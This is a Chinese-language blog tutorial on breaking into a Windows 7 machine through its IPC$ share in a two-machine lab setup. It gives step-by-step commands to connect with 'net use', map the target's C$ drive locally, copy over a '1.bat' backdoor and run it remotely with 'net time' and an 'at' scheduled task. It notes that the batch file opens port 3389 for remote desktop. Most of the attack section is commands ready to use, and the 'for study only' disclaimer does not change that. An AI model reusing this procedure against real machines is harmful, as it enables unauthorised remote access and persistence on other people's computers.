IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的。

一、环境配置

攻击机系统:windows7 64位 攻击机IP:192.168.1.45
吧唧机系统:windows7 64位 吧唧机IP:192.168.1.46
攻击使用端口:139

二、攻击过程

1.连接

首先使用端口扫描工具进行渗透扫描,是否开启139端口,或者IPC$共享服务。
(PS:可以直接使用命令进行连接,手动判断。)

命令如下(请确保你们在同一网段):

net use \\192.168.1.46\ipc$"Password" /user:"Username"
由于本人已经建立连接,所以导致错误。
也可以使用此命令直接连接,需要输入账户密码。
net use \\192.168.1.46
一个是已经输入了账户密码,一个是连接后输入账户密码,推荐第二个。

2.如何渗透

建立连接之后该如何渗透呢?
首先,我们将对方的C盘映射到我们本地或者服务器上面。
net use z: \\192.168.1.46\c$

命令解析: z: 是你本地盘符,请不要重复你本地已有盘符。
命令解析: \192.168.1.46\c$ 吧唧机的C盘目录。

将文件直接复制到吧唧机上,如何运行呢?

首先获取吧唧机时间,创建计划任务需要用到。

net time \\192.168.1.46
创建计划任务,运行1.bat后门程序
at \\192.168.1.46 19:45 C:\1.bat

命令解析:创建计划任务,运行吧唧机C盘目录下的1.bat文件
PS:计划任务只可以运行bat或者exe文件。
记住,创建的时间一定要比吧唧机时间大,否则要到明天才会运行任务...

等待创建时间过去,我们开始远程连接吧唧机。

连接成功,这里就不登录了,bat或者exe的用途很多,自己想吧。

附:1.bat开启3389端口命令

仅供学习交流!!!

最后修改:2022 年 09 月 29 日

感谢看完,可以点个赞~请作者喝杯咖啡~ヾ(◍°∇°◍)ノ゙❤